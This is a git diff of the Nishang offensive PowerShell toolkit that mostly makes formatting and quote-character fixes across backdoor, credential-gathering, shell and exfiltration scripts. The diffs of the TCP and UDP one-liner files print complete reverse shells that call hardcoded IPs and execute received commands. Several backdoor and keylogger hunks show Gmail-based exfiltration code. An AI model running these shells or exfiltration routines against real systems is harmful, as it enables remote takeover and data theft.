diff --git a/ActiveDirectory/Get-Unconstrained.ps1 b/ActiveDirectory/Get-Unconstrained.ps1 index ebf6e8c..497b862 100644 --- a/ActiveDirectory/Get-Unconstrained.ps1 +++ b/ActiveDirectory/Get-Unconstrained.ps1 @@ -1,4 +1,4 @@ -function Get-Unconstrained { +function Get-Unconstrained { <# .SYNOPSIS Nishang script which searches computers in current domain which have Unconstrained Delegation Enabled. diff --git a/Backdoors/Add-RegBackdoor.ps1 b/Backdoors/Add-RegBackdoor.ps1 index 20242bb..1017393 100644 --- a/Backdoors/Add-RegBackdoor.ps1 +++ b/Backdoors/Add-RegBackdoor.ps1 @@ -1,4 +1,4 @@ - + function Add-RegBackdoor { [CmdletBinding()] Param( diff --git a/Backdoors/Add-ScrnSaveBackdoor.ps1 b/Backdoors/Add-ScrnSaveBackdoor.ps1 index 6586efa..508e73d 100644 --- a/Backdoors/Add-ScrnSaveBackdoor.ps1 +++ b/Backdoors/Add-ScrnSaveBackdoor.ps1 @@ -1,4 +1,4 @@ -function Add-ScrnSaveBackdoor +function Add-ScrnSaveBackdoor { <# .SYNOPSIS diff --git a/Backdoors/DNS_TXT_Pwnage.ps1 b/Backdoors/DNS_TXT_Pwnage.ps1 index fce842d..98479dc 100644 --- a/Backdoors/DNS_TXT_Pwnage.ps1 +++ b/Backdoors/DNS_TXT_Pwnage.ps1 @@ -335,13 +335,13 @@ function Do-Exfiltration-Dns($pastename,$pastevalue,$ExfilOption,$dev_key,$usern elseif ($exfiloption -eq "gmail") { #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage - $smtpserver = “smtp.gmail.com” + $smtpserver = "smtp.gmail.com" $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer ) $smtp.EnableSsl = $True - $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); - $msg.From = “$username@gmail.com” - $msg.To.Add(”$username@gmail.com”) + $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); + $msg.From = "$username@gmail.com" + $msg.To.Add("$username@gmail.com") $msg.Subject = $pastename $msg.Body = $pastevalue if ($filename) diff --git a/Backdoors/Execute-OnTime.ps1 b/Backdoors/Execute-OnTime.ps1 index 4bf8e51..b83552d 100644 --- a/Backdoors/Execute-OnTime.ps1 +++ b/Backdoors/Execute-OnTime.ps1 @@ -222,13 +222,13 @@ function Do-Exfiltration-Time($pastename,$pastevalue,$ExfilOption,$dev_key,$user elseif ($exfiloption -eq "gmail") { #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage - $smtpserver = “smtp.gmail.com” + $smtpserver = "smtp.gmail.com" $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer ) $smtp.EnableSsl = $True - $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); - $msg.From = “$username@gmail.com” - $msg.To.Add(”$username@gmail.com”) + $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); + $msg.From = "$username@gmail.com" + $msg.To.Add("$username@gmail.com") $msg.Subject = $pastename $msg.Body = $pastevalue if ($filename) diff --git a/Backdoors/Gupt-Backdoor.ps1 b/Backdoors/Gupt-Backdoor.ps1 index a5f4fed..8220b19 100644 --- a/Backdoors/Gupt-Backdoor.ps1 +++ b/Backdoors/Gupt-Backdoor.ps1 @@ -1,4 +1,4 @@ - + function Gupt-Backdoor { diff --git a/Backdoors/HTTP-Backdoor.ps1 b/Backdoors/HTTP-Backdoor.ps1 index de4f54b..0e00b41 100644 --- a/Backdoors/HTTP-Backdoor.ps1 +++ b/Backdoors/HTTP-Backdoor.ps1 @@ -240,13 +240,13 @@ function Do-Exfiltration-HTTP($pastename,$pastevalue,$ExfilOption,$dev_key,$user elseif ($exfiloption -eq "gmail") { #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage - $smtpserver = “smtp.gmail.com” + $smtpserver = "smtp.gmail.com" $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer ) $smtp.EnableSsl = $True - $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); - $msg.From = “$username@gmail.com” - $msg.To.Add(”$username@gmail.com”) + $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); + $msg.From = "$username@gmail.com" + $msg.To.Add("$username@gmail.com") $msg.Subject = $pastename $msg.Body = $pastevalue if ($filename) diff --git a/Backdoors/Invoke-ADSBackdoor.ps1 b/Backdoors/Invoke-ADSBackdoor.ps1 index 218020e..44a8583 100644 --- a/Backdoors/Invoke-ADSBackdoor.ps1 +++ b/Backdoors/Invoke-ADSBackdoor.ps1 @@ -1,4 +1,4 @@ -function Invoke-ADSBackdoor{ +function Invoke-ADSBackdoor{ <# .SYNOPSIS Nishang Script that will use Alternate Data Streams and Windows Registry to achieve persistence. diff --git a/Client/Out-CHM.ps1 b/Client/Out-CHM.ps1 index 5f07d7c..68c9aaf 100644 --- a/Client/Out-CHM.ps1 +++ b/Client/Out-CHM.ps1 @@ -1,4 +1,4 @@ - + function Out-CHM { diff --git a/Client/Out-Excel.ps1 b/Client/Out-Excel.ps1 index 40a9bbf..bcff8f1 100644 --- a/Client/Out-Excel.ps1 +++ b/Client/Out-Excel.ps1 @@ -1,4 +1,4 @@ - + function Out-Excel { diff --git a/Client/Out-HTA.ps1 b/Client/Out-HTA.ps1 index 6ce7424..728161b 100644 --- a/Client/Out-HTA.ps1 +++ b/Client/Out-HTA.ps1 @@ -1,4 +1,4 @@ - + function Out-HTA { <# diff --git a/Client/Out-JS.ps1 b/Client/Out-JS.ps1 index 0c9d229..0c0c063 100644 --- a/Client/Out-JS.ps1 +++ b/Client/Out-JS.ps1 @@ -1,4 +1,4 @@ -function Out-JS +function Out-JS { <# .SYNOPSIS diff --git a/Client/Out-Java.ps1 b/Client/Out-Java.ps1 index fcd2c28..8fc1d16 100644 --- a/Client/Out-Java.ps1 +++ b/Client/Out-Java.ps1 @@ -1,4 +1,4 @@ - + function Out-Java { diff --git a/Client/Out-SCF.ps1 b/Client/Out-SCF.ps1 index 83695a0..8e87b41 100644 --- a/Client/Out-SCF.ps1 +++ b/Client/Out-SCF.ps1 @@ -1,4 +1,4 @@ -function Out-SCF +function Out-SCF { <# .SYNOPSIS diff --git a/Client/Out-SCT.ps1 b/Client/Out-SCT.ps1 index 62530f8..5c03f29 100644 --- a/Client/Out-SCT.ps1 +++ b/Client/Out-SCT.ps1 @@ -1,4 +1,4 @@ -function Out-SCT +function Out-SCT { <# .SYNOPSIS diff --git a/Client/Out-Shortcut.ps1 b/Client/Out-Shortcut.ps1 index 272fe56..7d95d73 100644 --- a/Client/Out-Shortcut.ps1 +++ b/Client/Out-Shortcut.ps1 @@ -1,4 +1,4 @@ - + function Out-Shortcut { <# diff --git a/Client/Out-WebQuery.ps1 b/Client/Out-WebQuery.ps1 index 499e353..e01ec8d 100644 --- a/Client/Out-WebQuery.ps1 +++ b/Client/Out-WebQuery.ps1 @@ -1,4 +1,4 @@ -function Out-WebQuery +function Out-WebQuery { <# .SYNOPSIS diff --git a/Client/Out-Word.ps1 b/Client/Out-Word.ps1 index 4312f7f..c3c8a6e 100644 --- a/Client/Out-Word.ps1 +++ b/Client/Out-Word.ps1 @@ -1,4 +1,4 @@ -function Out-Word +function Out-Word { <# .SYNOPSIS diff --git a/Escalation/Invoke-PsUACme.ps1 b/Escalation/Invoke-PsUACme.ps1 index 91de533..b8c50dd 100644 --- a/Escalation/Invoke-PsUACme.ps1 +++ b/Escalation/Invoke-PsUACme.ps1 @@ -1,4 +1,4 @@ -function Invoke-PsUACme +function Invoke-PsUACme { <# .SYNOPSIS diff --git a/Execution/Out-RundllCommand.ps1 b/Execution/Out-RundllCommand.ps1 index 625c02d..2ef7b59 100644 --- a/Execution/Out-RundllCommand.ps1 +++ b/Execution/Out-RundllCommand.ps1 @@ -1,4 +1,4 @@ -function Out-RundllCommand +function Out-RundllCommand { <# .SYNOPSIS diff --git a/Gather/Get-PassHints.ps1 b/Gather/Get-PassHints.ps1 index c98a8bd..121ef0a 100644 --- a/Gather/Get-PassHints.ps1 +++ b/Gather/Get-PassHints.ps1 @@ -1,4 +1,4 @@ -function Get-PassHints { +function Get-PassHints { <# .SYNOPSIS Nishang script which extracts password hint for users in clear text. diff --git a/Gather/Get-WebCredentials.ps1 b/Gather/Get-WebCredentials.ps1 index 1a856a3..aefe949 100644 --- a/Gather/Get-WebCredentials.ps1 +++ b/Gather/Get-WebCredentials.ps1 @@ -1,4 +1,4 @@ -#Requires -Version 3 +#Requires -Version 3 function Get-WebCredentials { diff --git a/Gather/Invoke-Mimikatz.ps1 b/Gather/Invoke-Mimikatz.ps1 index 0d14e8c..c81ce0b 100644 --- a/Gather/Invoke-Mimikatz.ps1 +++ b/Gather/Invoke-Mimikatz.ps1 @@ -1,4 +1,4 @@ -function Invoke-Mimikatz +function Invoke-Mimikatz { <# .SYNOPSIS diff --git a/Gather/Invoke-MimikatzWDigestDowngrade.ps1 b/Gather/Invoke-MimikatzWDigestDowngrade.ps1 index 312f6ed..01d55e0 100644 --- a/Gather/Invoke-MimikatzWDigestDowngrade.ps1 +++ b/Gather/Invoke-MimikatzWDigestDowngrade.ps1 @@ -1,4 +1,4 @@ -function Invoke-MimikatzWDigestDowngrade +function Invoke-MimikatzWDigestDowngrade { <# .SYNOPSIS diff --git a/Gather/Keylogger.ps1 b/Gather/Keylogger.ps1 index fd5971c..1c7a3c6 100644 --- a/Gather/Keylogger.ps1 +++ b/Gather/Keylogger.ps1 @@ -299,13 +299,13 @@ function script:Keylogger elseif ($exfiloption -eq "gmail") { #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage - $smtpserver = “smtp.gmail.com” + $smtpserver = "smtp.gmail.com" $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer ) $smtp.EnableSsl = $True - $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); - $msg.From = “$username@gmail.com” - $msg.To.Add(”$username@gmail.com”) + $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); + $msg.From = "$username@gmail.com" + $msg.To.Add("$username@gmail.com") $msg.Subject = $pastename $msg.Body = $pastevalue if ($filename) diff --git a/Gather/Show-TargetScreen.ps1 b/Gather/Show-TargetScreen.ps1 index 102309e..b9d75bb 100644 --- a/Gather/Show-TargetScreen.ps1 +++ b/Gather/Show-TargetScreen.ps1 @@ -1,4 +1,4 @@ - + function Show-TargetScreen { <# diff --git a/MITM/Invoke-Interceptor.ps1 b/MITM/Invoke-Interceptor.ps1 index 7cfff71..bf29688 100644 --- a/MITM/Invoke-Interceptor.ps1 +++ b/MITM/Invoke-Interceptor.ps1 @@ -1,4 +1,4 @@ -function Invoke-Interceptor +function Invoke-Interceptor { <# .SYNOPSIS diff --git a/Pivot/Invoke-NetworkRelay.ps1 b/Pivot/Invoke-NetworkRelay.ps1 index 4311c23..3e2c7f4 100644 --- a/Pivot/Invoke-NetworkRelay.ps1 +++ b/Pivot/Invoke-NetworkRelay.ps1 @@ -1,4 +1,4 @@ -function Invoke-NetworkRelay +function Invoke-NetworkRelay { <# .SYNOPSIS diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1 index 6334308..db834e1 100644 --- a/Scan/Invoke-BruteForce.ps1 +++ b/Scan/Invoke-BruteForce.ps1 @@ -1,4 +1,4 @@ - + function Invoke-BruteForce { <# diff --git a/Shells/Invoke-JSRatRegsvr.ps1 b/Shells/Invoke-JSRatRegsvr.ps1 index 6f8fab0..edd9b93 100644 --- a/Shells/Invoke-JSRatRegsvr.ps1 +++ b/Shells/Invoke-JSRatRegsvr.ps1 @@ -1,4 +1,4 @@ -function Invoke-JSRatRegsvr +function Invoke-JSRatRegsvr { <# .SYNOPSIS diff --git a/Shells/Invoke-JSRatRundll.ps1 b/Shells/Invoke-JSRatRundll.ps1 index 4c8030e..5d82e4c 100644 --- a/Shells/Invoke-JSRatRundll.ps1 +++ b/Shells/Invoke-JSRatRundll.ps1 @@ -1,4 +1,4 @@ -function Invoke-JSRatRundll +function Invoke-JSRatRundll { <# .SYNOPSIS diff --git a/Shells/Invoke-PowerShellIcmp.ps1 b/Shells/Invoke-PowerShellIcmp.ps1 index 1b56ff1..9770a3c 100644 --- a/Shells/Invoke-PowerShellIcmp.ps1 +++ b/Shells/Invoke-PowerShellIcmp.ps1 @@ -1,4 +1,4 @@ -function Invoke-PowerShellIcmp +function Invoke-PowerShellIcmp { <# .SYNOPSIS diff --git a/Shells/Invoke-PowerShellTcp.ps1 b/Shells/Invoke-PowerShellTcp.ps1 index 5f82967..cb72a39 100644 --- a/Shells/Invoke-PowerShellTcp.ps1 +++ b/Shells/Invoke-PowerShellTcp.ps1 @@ -1,4 +1,4 @@ -function Invoke-PowerShellTcp +function Invoke-PowerShellTcp { <# .SYNOPSIS diff --git a/Shells/Invoke-PowerShellTcpOneLine.ps1 b/Shells/Invoke-PowerShellTcpOneLine.ps1 index 6b33bf0..629c465 100644 --- a/Shells/Invoke-PowerShellTcpOneLine.ps1 +++ b/Shells/Invoke-PowerShellTcpOneLine.ps1 @@ -1,4 +1,4 @@ -#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well. +#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well. #$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() #Even smaller reverse shell. Could fit in Two Tweets. diff --git a/Shells/Invoke-PowerShellUdp.ps1 b/Shells/Invoke-PowerShellUdp.ps1 index 899ea4d..00ab0dc 100644 --- a/Shells/Invoke-PowerShellUdp.ps1 +++ b/Shells/Invoke-PowerShellUdp.ps1 @@ -1,4 +1,4 @@ -function Invoke-PowerShellUdp +function Invoke-PowerShellUdp { <# .SYNOPSIS diff --git a/Shells/Invoke-PowerShellUdpOneLine.ps1 b/Shells/Invoke-PowerShellUdpOneLine.ps1 index a093ab7..68e3367 100644 --- a/Shells/Invoke-PowerShellUdpOneLine.ps1 +++ b/Shells/Invoke-PowerShellUdpOneLine.ps1 @@ -1,2 +1,2 @@ -#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well. +#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well. #$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("192.168.254.226"),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close() \ No newline at end of file diff --git a/Shells/Invoke-PowerShellWmi.ps1 b/Shells/Invoke-PowerShellWmi.ps1 index 457369c..04e266b 100644 --- a/Shells/Invoke-PowerShellWmi.ps1 +++ b/Shells/Invoke-PowerShellWmi.ps1 @@ -1,4 +1,4 @@ -function Invoke-PowerShellWmi{ +function Invoke-PowerShellWmi{ <# .SYNOPSIS diff --git a/Shells/Invoke-PsGcat.ps1 b/Shells/Invoke-PsGcat.ps1 index d4db482..6e8d4b2 100644 --- a/Shells/Invoke-PsGcat.ps1 +++ b/Shells/Invoke-PsGcat.ps1 @@ -1,4 +1,4 @@ -function Invoke-PSGcat +function Invoke-PSGcat { <# .SYNOPSIS diff --git a/Shells/Invoke-PsGcatAgent.ps1 b/Shells/Invoke-PsGcatAgent.ps1 index f2a7703..2ac8ecc 100644 --- a/Shells/Invoke-PsGcatAgent.ps1 +++ b/Shells/Invoke-PsGcatAgent.ps1 @@ -1,4 +1,4 @@ -function Invoke-PsGcatAgent +function Invoke-PsGcatAgent { <# .SYNOPSIS diff --git a/Shells/Remove-PoshRat.ps1 b/Shells/Remove-PoshRat.ps1 index ffbe90a..a6560d5 100644 --- a/Shells/Remove-PoshRat.ps1 +++ b/Shells/Remove-PoshRat.ps1 @@ -1,4 +1,4 @@ -function Remove-PoshRat +function Remove-PoshRat { <# .SYNOPSIS diff --git a/Utility/Add-Exfiltration.ps1 b/Utility/Add-Exfiltration.ps1 index dd62032..e09d2c1 100644 --- a/Utility/Add-Exfiltration.ps1 +++ b/Utility/Add-Exfiltration.ps1 @@ -1,4 +1,4 @@ - + function Add-Exfiltration { diff --git a/Utility/Do-Exfiltration.ps1 b/Utility/Do-Exfiltration.ps1 index d4057f7..b2b38c2 100644 --- a/Utility/Do-Exfiltration.ps1 +++ b/Utility/Do-Exfiltration.ps1 @@ -1,4 +1,4 @@ - + function Do-Exfiltration { <# diff --git a/Utility/Invoke-Decode.ps1 b/Utility/Invoke-Decode.ps1 index 15c3948..b2d84ef 100644 --- a/Utility/Invoke-Decode.ps1 +++ b/Utility/Invoke-Decode.ps1 @@ -1,4 +1,4 @@ - + function Invoke-Decode { <# diff --git a/Utility/Invoke-Encode.ps1 b/Utility/Invoke-Encode.ps1 index fc09536..7001ebc 100644 --- a/Utility/Invoke-Encode.ps1 +++ b/Utility/Invoke-Encode.ps1 @@ -1,4 +1,4 @@ -function Invoke-Encode +function Invoke-Encode { <# .SYNOPSIS diff --git a/Utility/Out-DnsTxt.ps1 b/Utility/Out-DnsTxt.ps1 index 3144b41..fb6637d 100644 --- a/Utility/Out-DnsTxt.ps1 +++ b/Utility/Out-DnsTxt.ps1 @@ -1,4 +1,4 @@ -function Out-DnsTxt +function Out-DnsTxt { <# .SYNOPSIS diff --git a/Utility/Start-CaptureServer.ps1 b/Utility/Start-CaptureServer.ps1 index 9c3522a..1031287 100644 --- a/Utility/Start-CaptureServer.ps1 +++ b/Utility/Start-CaptureServer.ps1 @@ -1,4 +1,4 @@ -function Start-CaptureServer +function Start-CaptureServer { <# .SYNOPSIS diff --git a/nishang.psm1 b/nishang.psm1 index 7e6f67c..ccb5798 100644 --- a/nishang.psm1 +++ b/nishang.psm1 @@ -1,4 +1,4 @@ - + <# Import this module to use all the scripts in Nishang, except Keylogger, in the current PowerShell session. The module must reside in the Nishang folder. diff --git a/powerpreter/Powerpreter.psm1 b/powerpreter/Powerpreter.psm1 index aa6f5a4..fd3c1bd 100644 --- a/powerpreter/Powerpreter.psm1 +++ b/powerpreter/Powerpreter.psm1 @@ -1,4 +1,4 @@ -<# +<# .SYNOPSIS Powerpreter is a module written in powershell. Powerpreter makes available maximum possible functionality of nishang in a single script. This is much helpful in scenarios like phishing attacks and webshells.